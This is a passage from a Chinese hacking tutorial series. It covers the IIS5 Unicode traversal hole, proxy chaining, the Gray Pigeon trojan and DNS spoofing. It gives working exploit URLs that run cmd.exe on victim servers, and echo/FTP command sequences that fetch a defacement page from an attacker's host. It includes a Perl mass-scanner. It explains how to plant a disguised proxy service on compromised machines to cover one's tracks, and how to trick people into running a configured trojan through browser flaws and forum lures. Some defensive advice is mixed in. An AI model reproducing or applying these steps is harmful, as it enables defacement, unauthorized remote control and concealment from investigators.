这个方法我不怎么知道,看了一些文章就COPY了一下,有点头晕,但应该能看懂:假设我们怀疑的主机的硬件地址是00:30:6E:00:9B:B9,它的ip地址是192.168.1.1,那么我们现在伪造出这样的一种icmp数据包:硬件地址是不与局域网内任何一台主机相同的00:30:6E:00:9B:9B,目的地址是192.168.1.1不变,我们可以设想一下这种数据包在局域网内传输会发生什么现象:任何正常的主机会检查这个数据包,比较数据包的硬件地址,和自己的不同,于是不会理会这个数据包,而处于网络监听模式的主机呢?由于它的网卡现在是在混杂模式的,所以它不会去对比这个数据包的硬件地址,而是将这个数据包直接传到上层,上层检查数据包的ip地址,符合自己的ip,于是会对对这个ping的包做出回应。这样,一台处于网络监听模式的主机就被发现了。 4:利用arp数据包进行监测 这个方法和上面的差不多,它使用arp数据包替代了上述的icmp数据包而已,向局域网内的主机发送非广播方式的arp包,如果局域网内的某个主机响应了这个arp请求,那 么我们就可以判断它很可能就是处于网络监听模式了,这是目前相对而言比较好的监测模式。 (什么叫ARP?就说ARP协议,它是Address Resolution Protocol”(地址解析协议)的缩写,在局域网中,网络中实际传输的是“帧”,帧里面是有目标主机的MAC地址的.所谓“地址解析”就是主机在发送帧前将目标IP地址转换成目标MAC地址的过程。ARP协议的基本功能就是通过目标设备的IP地址,查询目标设备的MAC地址,以保证通信的顺利进行。) 昨天有些朋友说找不到一些网络监听的工具,你在www.google.com搜sniffer tools有很多的. 我就列举一些了 Windows平台下的: Windump http://www.xfocus.net/tools/200108/238.html 相关介绍:http://security.zz.ha.cn/windump.html 注意这个是在NT下用的98就别用了,说到这想说一局如果你的系统是98或是ME的,最好换一个,因为好多很好的软件都要求是NT的 UNIX下: Sniffithttp://www.programsalon.com/download.asp?type_id=53??第6个 该软件的安装介绍:http://www.xfocus.net/articles/200001/28.html 第22章 IIS5 UNICODE 编码漏洞 前2天一直在讲网络监听,虽然我觉得很有必要,但好多人都发来消息说没什么太多兴趣。虽然还是很想讲这个,但因为大家有意见,就不说。经过快半个月的学习,我想如果你很认真的在看的话的,我想你的基本功已经很好了.今天开始我会开始由一些详细的攻击或其他的方法开始说了,有些地方我就不详细说明了,如果有问题可以发贴来问 回到话题,unicode 漏洞是最容易让入侵者得手的一个漏洞,可以不费吹灰之力将主页改掉,重则删除 硬盘上的数据,高手甚至获取administrator 权限! 漏洞自大前年年10 月份公布至今,居然国内还有这么多的服务器存在着该漏洞 下面我从一般的入侵手法分析如何做相应的防护对策. (一)unicode 漏洞的原理 有关漏洞的原理网上已经有很多相关的文章了,我不打算详细说,还是简单的来了解了解 好了! 实际上就是UNICODE 编码存在BUG,在UNICODE 编码中 %c1%1c -〉(0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = '/' %c0%2f -〉(0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = '\' 在NT4 中/编码为%c1%9c .在英文版里:WIN2000 英文版%c0%af 该漏洞是利用扩展UNICODE 字符取代"/"和"\"而能利用"../"目录遍历,故在一台有 unicode 漏洞的服务器ip 后边加上/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\就可 以看到主机上c 盘的所有文件及目录. (二)unicode 漏洞的危害 未经授权的用户可能利用IUSR_machinename 账号的上下文空间访问任何已知的文件。 该账号在默认情况下属于Everyone 和Users 组的成员,因此任何与Web 根目录在同一逻辑 驱动器上的能被这些用户组访问的文件都能被删除,修改或执行,就如同一个用户成功登陆 所能完成的一样。 以上部分内容摘自绿盟! (三)unicode 漏洞的攻击手法 1、利用漏洞修改主页 这可能是新手们最兴奋的事情了!每当他们成功地黑掉一个网页后都有一股极大的满足 感.然而黑网页也是最简单的事情。 手段描述一:入侵者先用扫描工具扫到有漏洞的主机后,在IE 的地址栏里输入http://主机 的ip/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\就可以看到主机上c 盘的所有文件 了.要查主页放在什么地方的话,可以将后边的dir+c:\换成set ,从返回的错误信息中找到 PATH_TRANSLATED=c:\inetpub\wwwroot 这一句(具体的路径根据具体的情况而定).其中的 c:\inetpub\wwwroot 就是主页所在的地方!接着入侵者为了避免系统对特殊字符的检测,故将 本地机器的CMD.EXE 程序复制到主机的c:\inetpub\scripts 目录中,这样干起活来就容易多了! 他们查到主页的名字后,就可以利用echo 命令来写入信息,将内容覆盖掉主页文件就把主页 给黑了。 手段描述二:除了上面的土方法外,入侵者可以将有声有色的黑页替换主页,这样黑得不是 更爽吗?来看看他们是如何做到的。 先在本地硬盘建立个共享文件夹(如gale),把黑页复制进去。照样把cmd.exe 拷贝到目标 的c:\inetpub\scripts 下,名字为gale.exe,映射本地的gale 目录为目标的一个盘(如q:) 把q:里的复制到目标主机的网页目录去。覆盖对方的网页文件,最后断开映射就可以了. 这是利用本地共享目录和映射硬盘的方法替换黑页,如果黑页有背景又有音乐,文件很大,上 传费事,怎么完美一点呢?请看下边。 手段描述三:这种方法也是红客们黑美国、日本的时候最常用的手法。 入侵者先申请一个免费空间,把做好的黑页上传上去,然后利用echo 命令在目标主机 上建立一个文本文件,写上几行命令,如下: 目标主机ip/scripts/gale.exe?/c+echo+open+你黑页所在的免费空间ip>文本文件名.txt 目标主机ip/gale.exe?/c+echo+你在黑页空间上的帐户>>文本文件名.txt 目标主机ip/gale.exe?/c+echo+密码>>文本文件名.txt 目标主机ip/gale.exe?/c+echo+get+index.htm>>文本文件名.txt 目标主机ip/gale.exe?/c+echo+bye>>文本文件名.txt 目标主机ip/gale.exe?/c+ftp+-s:文本文件名.txt 这样入侵者就可以将黑页从另外一个空间下载到目标主机上,copy 过去覆盖就可以了。 这样入侵者不受地方的限制,随便什么地方了,比如网吧。 (四)unicode 漏洞的防护措施 说了那么多,现在该转入正题了,下面我来说说防范的措施,这也是从攻击中总结出来 的一些措施,希望对大家有帮助。 1、打上最新补丁 作为一个网络管理员,为了服务器的安全,需要不停的打上最新补丁,这是比较有效的 方法。但你要记住:在网络上,没有绝对的安全的,道高一尺,魔高一丈,完全相信防火墙和系 统补丁往往是很愚蠢的。 2、冷酷到底,拒人于千里之外 相信到现在还利用unicode 漏洞入侵的人都是些新手傻瓜们!他们没有确定的入侵目标, 只是抓个扫描器来乱扫一通,扫到就黑,扫不到就哭的那种。对付扫描器扫出未知的漏洞, 这是管理员的聪明之处。如何躲过扫描器的眼睛呢?请先看看下面一个用perl 写的扫描器代 码吧: #!/usr/bin/perl #Root Shell Hackers #piffy #this is a quick scanner i threw together while supposedly doing homework in my room. #it will go through a list of sites and check if it gives a directory listing for the new IIS hole #it checks for both %c0%af and %c1%9c (其他版本的请修改这样的字符) #perhaps a public script to do some evil stuff with this exploit later...h0h0h0 #werd: all of rsh, 0x7f, hackweiser, rain forest puppy for researching the hole =] use strict; use LWP::UserAgent; use HTTP::Request; use HTTP::Response; my $def = new LWP::UserAgent; my @host; print "root shell hackers\n"; print "iis cmd hole scanner\n"; print "coded by piffy\n"; print "\nWhat file contains the hosts: "; chop (my $hosts=); open(IN, $hosts) || die "\nCould not open $hosts: $!"; while () { $host[$a] = $_; chomp $host[$a]; $a++; $b++; } close(IN); $a = 0; print "ph34r, scan started"; while ($a < $b) { my $url="http://$host[$a]/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ "; my $request = new HTTP::Request('GET', $url); my $response = $def->request($request); if ($response->is_success) { print $response->content; open(OUT, ">>scaniis.log"); print OUT "\n$host[$a] : $response->content"; -close OUT; } else { print $response->error_as_HTML; } &second() } sub second() { my $url2="http://$host[$a]/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\ "; my $request = new HTTP::Request('GET', $url2); my $response = $def->request($request); if ($response->is_success) { print $response->content; open(OUT, ">>scaniis.log"); print OUT "\n$host[$a] : $response->content"; -close OUT; } else { print $response->error_as_HTML; } $a++; } 代码摘自绿盟。 不知道大家注意到上面长长的两行$url 和$url2 了没有,其实只是简单的字符串处理而 已。于是有以下几种方法避过扫描器的扫描: ①更改winnt 目录名 安装winnt 或者win2000 时,缺省目录是c:\winnt.可以把这个目录名改成别的目录名, 这样扫描器递交"http://$host[$a]/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\"类似的 url 时就会返回"找不到该页"的信息。这样大部分扫描器就成失灵了。(不知道小榕的流光能 不能躲得过,但大部分的用perl 写的扫描器经这样改了之后都不起作用了)。 安装前就可以这样,但是已经安装了,确实不想改winnt/2000 的目录怎么办呢?那好,可以 看看下边的: ②更改cmd.exe 和各常用命令的名称 更改cmd.exe 的名称也可以达到同样的效果,而且更加可*,假如你只更改winnt/win2000 所在的目录名的话,别人猜对后仍然可以黑掉你。同时把一些不常用的而且有危害的命令改 成只有你知道的名字,①和②结合的话更完美! ③改变web 目录位置 通常主页所在的位置是在C:\InetPub\wwwroot 里。在c:\inetpub 里有scripts 之类的目录。 如果你不需要他们的话,你可以把web 目录转移到别的分区,比如e:\netroot 然后把C:\inetpub 整个删除掉.日本有一台主机就做的比较好,它的机器明明存在有unicode 漏洞,但将web 目录 转移到d 盘,并且d 盘是不可写的,有位新手在QQ 上向我抱怨说:"老大!你说的方法不行呀, 我黑不了!呜呜呜~~",哈!象这样,一般的人就难以修改主页了,(注意:这只能防止一般的人,高 手只要动动脑筋,照样能黑掉!). ④停止不必要的服务 在internet 服务器中,为了系统的安全,您必须停掉所有的缺省web 目录的服务。然后统统 删掉,只保留你所要的,以免招来后患. ⑤改变服务的端口号 在保证不影响访问率的情况下,我们可以把web 服务的端口由80 改成别的,比如108。 因为很多还是利用unicode 漏洞攻击的人一般都是新手,他们都是拿一个扫描工具扫一个ip 段的,这样做就可以躲避那种扫描一段网段的攻击者的扫描了。(注意:此方法只能防止这种方 式的扫描,别有用心的攻击者照样可以通过修改扫描器的插件来实行扫描的.但受攻击的可能 性已经减低.) 3、限制iusr_server 的权限 上面所说的措施是把攻击者拒绝于门外,如果真的很不幸,给攻击者找到门上来了,那 不是死定了?不一定!攻击者利用UNICODE 漏洞遍历目录时的用户权限是决定于 iusr_server 的权限的,而通常iusr_server 是属于guest 组的。我们只要进一步限制iusr_server 的权限还有可能挽回(对于高手们就不一定这么说了)。 建议如下:采用NTFS 格式的文件系统,将web 目录外所有的访问权限设置为:用户 iusr_server 不可访问!注意:不要给iusr_server 对web 目录有写权限!理由是什么大家都很 清楚!你的主页就是给这样的家伙给黑的,如果他没有写的权限,就象那台日本的主机一样, 一般的新手们就难以下手了。(但是,那些确实是非写不可的地方,如:聊天室或论坛,是 可以适当放开的)。 4、偷吃成功,寻找蛛丝马迹 这就是分析访问日志,一名合格的管理员,应该有经常查看日志的好习惯.日志是非常的 多的,看起来很麻烦,但对于unicode 漏洞的攻击,只要查看分析web 服务的访问日志就可以 了。扫描器的扫描和已经攻击完了的动作都会被记录下来,要注意特别留意出现的"cmd.exe" 字眼。 最后,我建议: ①管理好你的admin 帐户和密码 因为现在的黑客新手们虽然是冲着unicode 漏洞而来,但他们的师父们往往推荐他们用小 榕的流光,这是一个强大的漏洞扫描工具.在扫描的过程中,脆弱的管理员帐户和密码(如:帐 户:admin 密码:1234)很容易被猜中,给他们带来了以外的收获.无论怎么强大,流光也是*黑 客字典来暴力破解的,只要你密码复杂就可以避免猜中.长度最好超过8 位,大小写和复杂字符 同时出现,如:g&A$l#e7 这样的密码就很难被猜中,当然,也许我这是废话。现在出现弱口令的机会是不多了 ②经常更改管理员的密码 保证只有你自己一个用户出现在管理员组,经常检查有没有可疑的用户。一般的新手都是 学着别人教的招数,在管理员组里增加一个用户,留作后门.从入侵的角度来说,这是很危险的 做法,但作为管理员不可能没有发现的,(那要看管理员的素质如何了)。 第23章 跳板的故事 跳板,这里的不是指跳水的扳子(废话),我想大家多跳板都应该有个基本的认识:就是通过这个东西跳过什么东西,掩盖什么东西。给大家个图大家就明白跳板是什么了 此主题相关图片如下: 知道了吧,就是隐藏你的足迹,想要找出你,就必须连接x个你所通过的机器,并且找出他们的log,如果碰巧有一个没有记录,线就断了:),即使都记录了,log里面登记的IP也是上一级跳板主机的IP… 当然跳板还可以用于: .QQ或者ICQ .ftp客户端 .mail客户端 .telnet客户端 .端口扫描器 .(以及几乎所有在网络中所使用的工具) 想想如果不要跳板我们不是很危险吗? 这可能不适用于某些IRC服务器,因为它们常常查看打开着的wingates及proxies。 先说简单的windows下的sock代理怎么做 一.找一些运行wingate的主机 原因:因为wingates的默认安装打开端口1080并且不记录socks连接。 怎么找这些机子呢?你可以用‘代理猎手’,好象中国人都用这个,国外人好象喜欢用wingatescan,或是从这里可以找到最新的:http://www.cyberarmy.com/lists/wingate(国外的,我建议大家用国外的,因为追查有难度啊) 二.确认列表中的主机的确运行着wingate 三.安装一个能截取发送的信息包的软件 我使用的是一个叫purpose的工具,你可以从 http://www.buffy.nu/article.php3?id_article=3043 要设置它,只要在socks server填上: 127.0.0.1 port 8000. 选择'socks version 5'.再点击'resolve all names remotely'. 不要选'supported authentication'。 在主界面,选择new然后建立一个你希望socks支持的程序的快捷方式 对所有你想匿名的程序做同样的工作,至于有哪些你就自己想了 四.安装socks chainer 从http://www.ufasoft.com/socks下载该工具 在service菜单, 点击new。在name段输入Chain,port则输入8000。 点击new 并且将你找到最快的wingates的IP填进去,端口则填1080。 使用 '<' 和 '>', 你可以添加或者移除socks.记得一定要在使用前测试所有的socks. 五.测试你的设置 用你所建立的浏览器的快捷方式打开浏览器,连接到 http://cavency.virtualave.net/cgi-bin/env.cgi或者 http://internet.junkbuster.com/cgi-bin/show-http-headers 同样,打开你的telnet客户端并尝试telnet到 ftp.cztc.edu.cn 你可以通过https://sites.inka.de:8001/cgi-bin/pyca/browser-check.py来检测SSL或者 FTP到ftp.zedz.net——或者其它的FTP来验证你的IP。 在上面的测试中,远程主机上留下的将是你最后一个chain的IP地址。当然你可以在自己的 网络里进行测试…… 再说说另一种吧SkSockServer“(下面称SSS) 这个与上面的利用著名的wingate做的有什么区别? 1/ 普通的Sock代理程序不支持多跳板之间的连续跳,而SSS却可支持最多达255个跳板之间的连跳运动 2/ 普通的Sock代理程序之间的数据传输是不加密的,而SSS支持的跳板之间传输的数据是经过动态加密的,也就是说每次传输过程中,数据加密的方式都不相同。就算你不幸在..的过程中被webmaster发现,普通的sock代理程序将会被webmaster用sniffer把你的信息一览无遗,而恰巧你用的是SSS的话,呵呵~他将会看到一堆乱码 3/普通的sock代理程序在设置上比较烦琐,而SSS只用两步就全都ok了。(具体步骤将在下面说明) 普通的sock代理程序要不然只支持Tcp或Udp的连接,很少有二者兼顾的,而SSS却全部支持 下面是一个大哥写的教程我觉得不错,就COPY一下了 找A机上传SSS文件,(怎么找我想你应该有个肉鸡吧)如果权限足够的话,应该可以完成SSS的安装和启动。所示: SSS命令参数的说明: -install 在NT机上安装SSS -remove 移除SSS. -debug 呵呵~snake进行debug用的,对于咱们老百姓来言无用。 sksockserver –install 安装sksockserver。 net start skserver 启动skserver服务。:(注意:这可是在A机上运行的,可不是你自己的爱机) Ok啦~A机跳板完成,下面进行B机跳板的安装: 打开终端服务客户端连上找到的B菜机。 用B菜机的IE直接下载SSS~~呵呵~如图2:(IP地址隐去啦~大家自己找菜机吧) 图2 在B菜机上配置sockservercfg(因为是用vc编写的sockservercfg,所以必须有mfc的库文件,如果出现“无法定位序数XXXX于动态连接库mfc42.dll”的话,大家可以在自己的机子上找找,最终上传到B菜机的路径:X:\winnt\system32) sockservercfg图例说明:分见图3、图4、图5: 此主题相关图片如下: 此主题相关图片如下: 此主题相关图片如下: 图例说明: 图3:SSS的配置界面一:在名称处可以填上任意的程序说明,以方便糊弄网管。要注意三处画红圈处,分别为:程序在开机时自动启动(我第一次用的时候还以为是给SSS自动分配端口~哎~Snake!So lazy!~)、安装服务、启动服务。 图4:SSS的配置界面二:是对client端进行限制的配置(呵呵~大家讲点义气,就别做限制啦) 图5:SSS的配置界面三:重要的地方哟!在IP处填入刚才做好的A菜机的Ip地址;激活bActive处(哎~什么叫bActive呀~就不会多作一个取消的?Snake!!!Too too lazy!);之后点Add. 最后提醒一句别忘了点确定哟 ok啦~大功告成!再向大家推荐最后一个好东东-SocksCap(你可以在这找到:http://www.youngzsoft.com/cn/sockscap/)。在自己的机子上装好SocksCap后,设定用Sock5代理的IP地址(就是A菜机的地址),在SocksCap下运行程序,例如:telnet,ftp,ntshell,IE。。。。。所有可以上网的程序,呵呵~这样的你就从网络彻底消失啦~~ 总结: 这篇文章只讲了两个跳板,同理,只要再设置 C,D,E.....(只要你不嫌麻烦)上的配置,就连跳了n个跳板啦;在设置A机的时候其实最好也用3389登陆设置,这样的话可以自己设定SSS的端口。 如果大家不愿意自己去找代理 本站有个“代理天天更新” 有时间看看啊 第24章 灰鸽子挺进版全攻略和2003版使用心得 灰鸽子(纪念版)不会使用的人还很多,(什么你不知道什么叫灰鸽子?那你知道什么叫冰河或是什么男生什么女生呢?) 灰鸽子还有自己的网站http://main.huigezi.com/main.asp ,今天我们只是简单的说一下它的使用,如果在使用中遇到任何问题除了可以在这里问以外还可以到http://main.huigezi.com/main.asp去看看,一般都没问题的。 挺进版加上了穿过局域网控制内部机器的 功能,又是第一个使用域名来储存客户端IP地址的,灰鸽子(挺进版)文件: P_Client.exe (客户端文件) Server.exe (服务端文件,如果你想控制对方就可以配置一下,让对方运行,你就可以用客户端控制他了!) 程序界面(P_Client.exe): 此主题相关图片如下: 看了上面界面的注示,是不是有了一个底!那好我们就来一次“自动上线”式的控制吧! 注册域名: 在配置服务器程序之前,如果你没有域名可用的话,请随我来注册一个免费的域名吧! 1.点击工具栏上的第三个按扭!在程序界面里的图片上注明了注册域名、更新IP到域名、主机搜索的那个按扭! 此主题相关图片如下: 按了按钮后你会看见上面的界面了,看到了“注册域名”了吧! 点击“注册域名”选项卡!你会看见下面的界面! 此主题相关图片如下: 好的,现在我们就来注册一个域名吧!可以点击“.126.com”来改变申请域名的后缀,这里不我们不点击,保持不变! 现在我们填好域名、密码、E-Mail,就可以按注册域名按扭了!(在这里请确保你已经上网了!)按完成请注意注册结果框里 的提示信息!如果成功的话,大家往下看,注册失败请换个域名试试! 配置服务端程序: 好的,现在大家有了域名了,可以配置服务端程序了!大家在程序界面里看到了配置服务端程序的按扭了吧!就是工具 栏上的第七个按扭!点它就会出现下面的界面! 此主题相关图片如下: 好的,我们点“下一步”继续 此主题相关图片如下: 按上图所说的做吧,好的,我们已经完成了最关键的一步了! 为了节省时间,大家可以一直按“下一步”按扭 好的,我们配置服务器的工作就完成了! 现在我们要的就是把我们配置的“Server.exe”,让 对方运行了(比如说在网吧运行一下) 安装传播已经配置的服务端程序: 好的,我们现在已经把我们刚配置的服务器端程序发给了一个在网吧上网的朋友!现在就看一个怎么控制吧! 等待自动上线: 如果网友已经打开了我们发过去的服务端!应该在一分钟之内自动上线!如果“文件管理器”中多出了绿屏的主机,就是自动上线的主机了!我们选中“文件管理器”中自动上线的主机进行连接!如果不出错的话应可以看到它的驱动器列表了! 哈哈,你不仅可以管理文件,还可以进行其它控制 这就是这个软件的简单应用 很简单吧 再说说灰鸽子2003的一些使用心得吧 2003的界面类似XP,内容方面和这个挺进版差不多,最大的改动就是搜索主机的IPC弱口令探测这个东西去掉了,速度没什么改进,但比辐射版要快不少。 至于使用感受:首先用灰鸽子自己本身得搜索功能还真得难找到一个好的机子,搜索速度太慢了,这时候我们可以用SUPERSCAN这种专业的扫描软件,添好默认的端口,能大大提高效率。还有就是关键在于怎么骗取别人运行自己的服务端。最快的就是先把自己的服务端加载在网页中利用IE的自动下载运行漏洞,反正不会用很对人去升级计算机系统漏洞的。再到各大的论坛说自己有免费的QQ或电影看,贪小便宜的人肯定很多的。 申明:我网站和论坛的页面绝不含任何这种东西或是木马,请大家放心。 第25章 几个DNS问题和网络攻击与防范 现在的Internet上存在的DNS服务器有绝大多数都是用bind来架设的,使用的bind版本主要为bind 4.9.5+P1以前版本和bind 8.2.2-P5以前版本.这些bind有个共同的特点,就是BIND会缓存(Cache)所有已经查询过的结果,这个问题就引起了下面的几个问题的存在.(什么叫BIND?BIND是一款由ISC维护的Internet域名名字系统实现。) 1>.DNS欺骗 在DNS的缓存还没有过期之前,如果在DNS的缓存中已经存在的记录,一旦有客户查询,DNS服务器将会直接返回缓存中的记录. 下面我们来看一个例子: 一台运行着unix的Internet主机,并且提供rlogin服务,它的IP地址为123.45.67.89,它使用的DNS服务器(即/etc/resolv.conf中指向的DNS服务器)的IP地址为98.76.54.32,某个客户端(IP地址为38.222.74.2)试图连接到unix主机的rlogin端口,假设unix主机的/etc/hosts.equiv文件中使用的是dns名称来允许目标主机的访问,那么unix主机会向IP为98.76.54.32的DNS服务器发出一个PTR记录的查询: 123.45.67.89 -> 98.76.54.32 [Query] NQY: 1 NAN: 0 NNS: 0 NAD: 0 QY: 2.74.222.38.in-addr.arpa PTR IP为98.76.54.32的DNS服务器中没有这个反向查询域的信息,经过一番查询,这个DNS服务器找到38.222.74.2和38.222.74.10为74.222.38.in-addr.arpa.的权威DNS服务器,所以它会向38.222.74.2发出PTR查询: 98.76.54.32 -> 38.222.74.2 [Query] NQY: 1 NAN: 0 NNS: 0 NAD: 0 QY: 2.74.222.38.in-addr.arpa PTR 请注意,38.222.74.2是我们的客户端IP,也就是说这台机子是完全掌握在我们手中的.我们可以更改它的DNS记录,让它返回我们所需要的结果: 38.222.74.2 -> 98.76.54.32 [Answer] NQY: 1 NAN: 2 NNS: 2 NAD: 2 QY: 2.74.222.38.in-addr.arpa PTR AN: 2.74.222.38.in-addr.arpa PTR trusted.host.com AN: trusted.host.com A 38.222.74.2 NS: 74.222.38.in-addr.arpa NS ns.sventech.com NS: 74.222.38.in-addr.arpa NS ns1.sventech.com AD: ns.sventech.com A 38.222.74.2 AD: ns1.sventech.com A 38.222.74.10 当98.76.54.32的DNS服务器收到这个应答后,会把结果转发给123.45.67.98,就是那台有rlogin服务的unix主机(也是我们的目标 :) ),并且98.76.54.32这台DNS服务器会把这次的查询结果缓存起来. 这时unix主机就认为IP地址为38.222.74.2的主机名为trusted.host.com,然后unix主机查询本地的/etc/hosts.equiv文件,看这台主机是否被允许使用rlogin服务,很显然,我们的欺骗达到了. 在unix的环境中,有另外一种技术来防止这种欺骗的发生,就是查询PTR记录后,也查询PTR返回的主机名的A记录,然后比较两个IP地址是否相同: 123.45.67.89 -> 98.76.54.32 [Query] NQY: 1 NAN: 0 NNS: 0 NAD: 0 QY: trusted.host.com A 很不幸,在98.76.54.32的DNS服务器不会去查询这个记录,而会直接返回在查询2.74.222.38.in-addr.arpa时得到的并且存在缓存中的信息: 98.76.54.32 -> 123.45.67.89 [Query] NQY: 1 NAN: 1 NNS: 2 NAD: 2 QY: trusted.host.com A AN: trusted.host.com A 38.222.74.2 NS: 74.222.38.in-addr.arpa NS ns.sventech.com NS: 74.222.38.in-addr.arpa NS ns1.sventech.com AD: ns.sventech.com A 38.222.74.2 AD: ns1.sventech.com A 38.222.74.10 那么现在unix主机就认为38.222.74.2就是真正的trusted.host.com了,我们的目的达到了! 这种IP欺骗的条件是:你必须有一台Internet上的授权的DNS服务器,并且你能控制这台服务器,至少要能修改这台服务器的DNS记录,我们的欺骗才能进行. 2>.拒绝服务攻击 Denial of service 还是上面的例子,如果我们更改位于38.222.74.2的记录,然后对位于98.76.54.32的DNS服务器发出2.74.222.38.in-addr.arpa的查询,并使得查询结果如下: 因为74.222.38.in-addr.arpa完全由我们控制,所以我们能很方便的修改这些信息来实现我们的目的. 38.222.74.2 -> 98.76.54.32 [Answer] NQY: 1 NAN: 2 NNS: 2 NAD: 2 QY: 2.74.222.38.in-addr.arpa PTR AN: 2.74.222.38.in-addr.arpa PTR trusted.host.com AN:www.company.com A 0.0.0.1 NS: 74.222.38.in-addr.arpa NS ns.sventech.com NS: 74.222.38.in-addr.arpa NS ns1.sventech.com AD: ns.sventech.com A 38.222.74.2 AD: ns1.sventech.com A 38.222.74.10 这样一来,使用98.76.54.32这台DNS服务器的用户就不能访问www.company.com了,因为这个IP根本就不存在! 3>.偷取服务 Theft of services 还是上面的例子,只是更改的查询结果如下: 38.222.74.2 -> 98.76.54.32 [Answer] NQY: 1 NAN: 3 NNS: 2 NAD: 2 QY: 2.74.222.38.in-addr.arpa PTR AN: 2.74.222.38.in-addr.arpa PTR trusted.host.com AN:www.company.com CNAMEwww.competitor.com AN: company.com MX 0 mail.competitor.com NS: 74.222.38.in-addr.arpa NS ns.sventech.com NS: 74.222.38.in-addr.arpa NS ns1.sventech.com AD: ns.sventech.com A 38.222.74.2 AD: ns1.sventech.com A 38.222.74.10 这样一来,一个本想访问http://www.competitor.com的用户会被带到另外一个地方,甚至是敌对的公司的竹叶(想想把华为和北电联起来是什么样的感觉.:) ).并且发给company.com的邮件会被发送给mail.compertitor.com.(越来越觉得在网络上的日子不踏实! xxbin这样想). 4>.限制 对这些攻击,也有一定的限制. 首先,攻击者不能替换缓存中已经存在的记录.比如说,如果在98.76.54.32这个DNS服务器上已经有一条www.company.com的CNAME记录,那么攻击者试图替换为www.competitor.com将不会成功.然而,一些记录可以累加,比如A记录,如果在DNS的缓存中已经存在一条www.company.com的A记录为1.2.3.4,而攻击者却欺骗DNS服务器说www.company.com的A记录为4.3.2.1,那么www.company.com将会有两个A记录,客户端查询时会随机返回其中一个.(呵呵,这不是loading balance么?) 其次,DNS服务器有个缓存刷新时间问题,如果www.netbuddy.org的TTL为7200,那么DNS服务器仅仅会把www.netbuddy.org的信息缓存7200秒或者说两个小时.如果攻击者放入一条TLL为604800的A记录,那么这条记录将会在缓存中保存一周时间,过了默认的两天后,这个DNS服务器就会到处"分发"攻击者假造的记录. 下面是常用的几种可以累加和不能累加的记录: A can add NS can add MX can add PTR cannot add CNAME cannot add 再说说网络攻击的几种形式吧,说这个不是叫大家去攻击别人而是作为一种了解而已 1、服务拒绝攻击 服务拒绝攻击企图通过使你的服务计算机崩溃或把它压跨来阻止你提供服务,服务拒绝攻击是最容易实施的攻击行为,主要包括: 死亡之ping (ping of death) 概览:由于在早期的阶段,路由器对包的最大尺寸都有限制,许多操作系统对TCP/IP栈的实现在ICMP包上都是规定64KB,并且在对包的标题头进行读取之后,要根据该标题头里包含的信息来为有效载荷生成缓冲区,当产生畸形的,声称自己的尺寸超过ICMP上限的包也就是加载的尺寸超过64K上限时,就会出现内存分配错误,导致TCP/IP堆栈崩溃,致使接受方当机。 防御:现在所有的标准TCP/IP实现都已实现对付超大尺寸的包,并且大多数防火墙能够自动过滤这些攻击,包括:从windows98之后的windows,NT(service pack 3之后),linux、Solaris、和Mac OS都具有抵抗一般ping of death攻击的能力。此外,对防火墙进行配置,阻断ICMP以及任何未知协议,都讲防止此类攻击。 泪滴(teardrop) 概览:泪滴攻击利用那些在TCP/IP堆栈实现中信任IP碎片中的包的标题头所包含的信息来实现自己的攻击。IP分段含有指示该分段所包含的是原包的哪一段的信息,某些TCP/IP(包括service pack 4以前的NT)在收到含有重叠偏移的伪造分段时将崩溃。 防御:服务器应用最新的服务包,或者在设置防火墙时对分段进行重组,而不是转发它们。 UDP洪水(UDP flood) 概览:各种各样的假冒攻击利用简单的TCP/IP服务,如Chargen和Echo来传送毫无用处的占满带宽的数据。通过伪造与某一主机的Chargen服务之间的一次的UDP连接,回复地址指向开着Echo服务的一台主机,这样就生成在两台主机之间的足够多的无用数据流,如果足够多的数据流就会导致带宽的服务攻击。 防御:关掉不必要的TCP/IP服务,或者对防火墙进行配置阻断来自Internet的请求这些服务的UDP请求。 SYN洪水(SYN flood) 现在最流行的DDOS攻击的一种 概览:一些TCP/IP栈的实现只能等待从有限数量的计算机发来的ACK消息,因为他们只有有限的内存缓冲区用于创建连接,如果这一缓冲区充满了虚假连接的初始信息,该服务器就会对接下来的连接停止响应,直到缓冲区里的连接企图超时。在一些创建连接不受限制的实现里,SYN洪水具有类似的影响。 防御:在防火墙上过滤来自同一主机的后续连接。 未来的SYN洪水令人担忧,由于释放洪水的并不寻求响应,所以无法从一个简单高容量的传输中鉴别出来。 Land攻击 概览:在Land攻击中,一个特别打造的SYN包它的原地址和目标地址都被设置成某一个服务器地址,此举将导致接受服务器向它自己的地址发送SYN-ACK消息,结果这个地址又发回ACK消息并创建一个空连接,每一个这样的连接都将保留直到超时掉,对Land攻击反应不同,许多UNIX实现将崩溃,NT变的极其缓慢(大约持续五分钟)。 防御:打最新的补丁,或者在防火墙进行配置,将那些在外部接口上入站的含有内部源地址滤掉。(包括 10域、127域、192.168域、172.16到172.31域) Smurf攻击 概览:一个简单的smurf攻击通过使用将回复地址设置成受害网络的广播地址的ICMP应答请求(ping)数据包来淹没受害主机的方式进行,最终导致该网络的所有主机都对此ICMP应答请求作出答复,导致网络阻塞,比ping of death洪水的流量高出一或两个数量级。更加复杂的Smurf将源地址改为第三方的受害者,最终导致第三方雪崩。 防御:为了防止黑客利用你的网络攻击他人,关闭外部路由器或防火墙的广播地址特性。为防止被攻击,在防火墙上设置规则,丢弃掉ICMP包。 Fraggle攻击 概览:Fraggle攻击对Smurf攻击作了简单的修改,使用的是UDP应答消息而非ICMP 防御:在防火墙上过滤掉UDP应答消息 电子邮件炸弹 概览:电子邮件炸弹是最古老的匿名攻击之一,通过设置一台机器不断的大量的向同一地址发送电子邮件,攻击者能够耗尽接受者网络的带宽。 防御:对邮件地址进行配置,自动删除来自同一主机的过量或重复的消息。 畸形消息攻击 概览:各类操作系统上的许多服务都存在此类问题,由于这些服务在处理信息之前没有进行适当正确的错误校验,在收到畸形的信息可能会崩溃。 防御:打最新的服务补丁。 2、利用型攻击 利用型攻击是一类试图直接对你的机器进行控制的攻击,最常见的有三种: 口令猜测 概览:一旦黑客识别了一台主机而且发现了基于NetBIOS、Telnet或NFS这样的服务的可利用的用户帐号,成功的口令猜测能提供对机器的控制。 